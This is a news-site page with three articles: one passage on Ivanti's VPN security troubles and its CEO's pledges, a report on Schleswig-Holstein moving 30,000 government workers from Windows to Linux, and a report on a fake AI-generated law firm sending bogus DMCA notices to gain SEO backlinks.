Because Ivanti makes VPN products that have been widely used in large organizations, including government agencies, it’s a rich target for threat actors and a target that’s seemed particularly soft in recent years. Ivanti’s Connect Secure, a VPN appliance often abbreviated as ICS, functions as a gatekeeper that allows authorized devices to connect.

Due to its wide deployment and always-on status, an ICS has been a rich target, particularly for nation-state-level actors and financially motivated intruders. ICS (formerly known as Pulse Connect) has had zero-day vulnerabilities previously exploited in 2019 and 2021. One PulseSecure vulnerability exploit led to money-changing firm Travelex working entirely from paper in early 2020 after ransomware firm REvil took advantage of the firm’s failure to patch a months-old vulnerability.

While some security professionals have given the firm credit, at times, for working hard to find and disclose new vulnerabilities, the sheer volume and cadence of vulnerabilities requiring serious countermeasures has surely stuck with some. “I don’t see how Ivanti survives as an enterprise firewall brand,” security researcher Jake Williams told the Dark Reading blog in mid-February.

Hence the open letter, the “new era,” the “broad shift,” and all the other pledges Ivanti has made. “We have already begun applying learnings from recent incidents to make immediate (emphasis Abbott’s) improvements to our own engineering and security practices. And there is more to come,” the letter states. Learnings, that is.

Ivanti CEO pledges to “fundamentally transform” its hard-hit security model Read More »

german-state-gov.-ditching-windows-for-linux,-30k-workers-migrating

German state gov. ditching Windows for Linux, 30K workers migrating

Open source FTW —

Schleswig-Holstein looks to succeed where Munich failed.

many penguins

Schleswig-Holstein, one of Germany’s 16 states, on Wednesday confirmed plans to move tens of thousands of systems from Microsoft Windows to Linux. The announcement follows previously established plans to migrate the state government off Microsoft Office in favor of open source LibreOffice.

As spotted by The Document Foundation, the government has apparently finished its pilot run of LibreOffice and is now announcing plans to expand to more open source offerings.

In 2021, the state government announced plans to move 25,000 computers to LibreOffice by 2026. At the time, Schleswig-Holstein said it had already been testing LibreOffice for two years.

As announced on Minister-President Daniel Gunther’s webpage this week, the state government confirmed that it’s moving all systems to the Linux operating system (OS), too. Per a website-provided translation:

With the cabinet decision, the state government has made the concrete beginning of the switch away from proprietary software and towards free, open-source systems and digitally sovereign IT workplaces for the state administration’s approximately 30,000 employees.

The state government is offering a training program that it said it will update as necessary.

Regarding LibreOffice, the government maintains the possibility that some jobs may use software so specialized that they won’t be able to move to open source software.

In 2021, Jan Philipp Albrecht, then-minister for Energy, Agriculture, the Environment, Nature, and Digitalization of Schleswig-Holstein, discussed interest in moving the state government off of Windows.

“Due to the high hardware requirements of Windows 11, we would have a problem with older computers. With Linux we don’t have that,” Albrecht told Heise magazine, per a Google translation.

This week’s announcement also said that the Schleswig-Holstein government will ditch Microsoft Sharepoint and Exchange/Outlook in favor of open source offerings Nextcloud and Open-Xchange, and Mozilla Thunderbird in conjunction with the Univention active directory connector.

Schleswig-Holstein is also developing an open source directory service to replace Microsoft’s Active Directory and an open source telephony offering.

Digital sovereignty dreams

Explaining the decision, the Schleswig-Holstein government’s announcement named enhanced IT security, cost efficiencies, and collaboration between different systems as its perceived benefits of switching to open source software.

Further, the government is pushing the idea of digital sovereignty, with Schleswig-Holstein Digitalization Minister Dirk Schrödter quoted in the announcement as comparing the concept’s value to that of energy sovereignty. The announcement also quoted Schrödter as saying that digital sovereignty isn’t achievable “with the current standard IT workplace products.”

Schrödter pointed to the state government’s growing reliance on cloud services and said that with related proprietary software, users have no influence on data flow and whether that data makes its way to other countries.

Schrödter also claimed that the move would help with the state’s budget by diverting money from licensing fees to “real programming services from our domestic digital economy” that could also create local jobs.

In 2021, Albrecht said the state was reaching its limits with proprietary software contracts because “license fees have continued to rise in recent years,” per Google’s translation.

“Secondly, regarding our goals for the digitalization of administration, open source simply offers us more flexibility,” he added.

At the time, Albrecht claimed that 90 percent of video conferences in the state government ran on the open source program Jitsi, which was advantageous during the COVID-19 pandemic because the state was able to quickly increase video conferencing capacity.

Additionally, he said that because the school portal was based on (unnamed) open source software, “we can design the interface flexibly and combine services the way we want.”

There are numerous other examples globally of government entities switching to Linux in favor of open source technology. Federal governments with particular interest in avoiding US-based technologies, including North Korea and China, are some examples. The South Korean government has also shared plans to move to Linux by 2026, and the city of Barcelona shared migration plans in 2018.

But some government bodies that have made the move regretted it and ended up crawling back to Windows. Vienna released the Debian-based distribution WIENUX in 2005 but gave up on migration by 2009.

In 2003, Munich announced it would be moving some 14,000 PCs off Windows and to Linux. In 2013, the LiMux project finished, but high associated costs and user dissatisfaction resulted in Munich announcing in 2017 that it would spend the next three years reverting back to Windows.

Albrecht in 2021 addressed this failure when speaking to Heise, saying, per Google’s translation:

The main problem there was that the employees weren’t sufficiently involved. We do that better. We are planning long transition phases with parallel use. And we are introducing open source step by step where the departments are ready for it. This also creates the reason for further rollout because people see that it works.

German state gov. ditching Windows for Linux, 30K workers migrating Read More »

fake-ai-law-firms-are-sending-fake-dmca-threats-to-generate-fake-seo-gains

Fake AI law firms are sending fake DMCA threats to generate fake SEO gains

Dewey Fakum & Howe, LLP —

How one journalist found himself targeted by generative AI over a keyfob photo.

Updated

Face composed of many pixellated squares, joining together

Enlarge / A person made of many parts, similar to the attorney who handles both severe criminal law and copyright takedowns for an Arizona law firm.

Getty Images

If you run a personal or hobby website, getting a copyright notice from a law firm about an image on your site can trigger some fast-acting panic. As someone who has paid to settle a news service-licensing issue before, I can empathize with anybody who wants to make this kind of thing go away.

Which is why a new kind of angle-on-an-angle scheme can seem both obvious to spot and likely effective. Ernie Smith, the prolific, ever-curious writer behind the newsletter Tedium, received a “DMCA Copyright Infringement Notice” in late March from “Commonwealth Legal,” representing the “Intellectual Property division” of Tech4Gods.

The issue was with a photo of a keyfob from legitimate photo service Unsplash used in service of a post about a strange Uber ride Smith once took. As Smith detailed in a Mastodon thread, the purported firm needed him to “add a credit to our client immediately” through a link to Tech4Gods, and said it should be “addressed in the next five business days.” Removing the image “does not conclude the matter,” and should Smith not have taken action, the putative firm would have to “activate” its case, relying on DMCA 512(c) (which, in many readings, actually does grant relief should a website owner, unaware of infringing material, “act expeditiously to remove” said material). The email unhelpfully points to the main page of the Internet Archive so that Smith might review “past usage records.”

A slice of the website for Commonwealth Legal Services, with every word of that phrase, including

A slice of the website for Commonwealth Legal Services, with every word of that phrase, including “for,” called into question.

Commonwealth Legal Services

There are quite a few issues with Commonwealth Legal’s request, as detailed by Smith and 404 Media. Chief among them is that Commonwealth Legal, a firm theoretically based in Arizona (which is not a commonwealth), almost certainly does not exist. Despite the 2018 copyright displayed on the site, the firm’s website domain was seemingly registered on March 1, 2024, with a Canadian IP location. The address on the firm’s site leads to a location that, to say the least, does not match the “fourth floor” indicated on the website.

While the law firm’s website is stuffed full of stock images, so are many websites for professional services. The real tell is the site’s list of attorneys, most of which, as 404 Media puts it, have “vacant, thousand-yard stares” common to AI-generated faces. AI detection firm Reality Defender told 404 Media that his service spotted AI generation in every attorneys’ image, “most likely by a Generative Adversarial Network (GAN) model.”

Then there are the attorneys’ bios, which offer surface-level competence underpinned by bizarre setups. Five of the 12 supposedly come from acclaimed law schools at Harvard, Yale, Stanford, and University of Chicago. The other seven seem to have graduated from the top five results you might get for “Arizona Law School.” Sarah Walker has a practice based on “Copyright Violation and Judicial Criminal Proceedings,” a quite uncommon pairing. Sometimes she is “upholding the rights of artists,” but she can also “handle high-stakes criminal cases.” Walker, it seems, couldn’t pick just one track at Yale Law School.

Why would someone go to the trouble of making a law firm out of NameCheap, stock art, and AI images (and seemingly copy) to send quasi-legal demands to site owners? Backlinks, that’s why. Backlinks are links from a site that Google (or others, but almost always Google) holds in high esteem to a site trying to rank up. Whether spammed, traded, generated, or demanded through a fake firm, backlinks power the search engine optimization (SEO) gray, to very dark gray, market. For all their touted algorithmic (and now AI) prowess, search engines have always had a hard time gauging backlink quality and context, so some site owners still buy backlinks.

The owner of Tech4Gods told 404 Media’s Jason Koebler that he did buy backlinks for his gadget review site (with “AI writing assistants”). He disclaimed owning the disputed image or any images and made vague suggestions that a disgruntled former contractor may be trying to poison his ranking with spam links.

Asked by Ars if he had heard back from “Commonwealth Legal” now that five business days were up, Ernie Smith tells Ars: “No, alas.”

This post was updated at 4: 50 p.m. Eastern to include Ernie Smith’s response.

Fake AI law firms are sending fake DMCA threats to generate fake SEO gains Read More »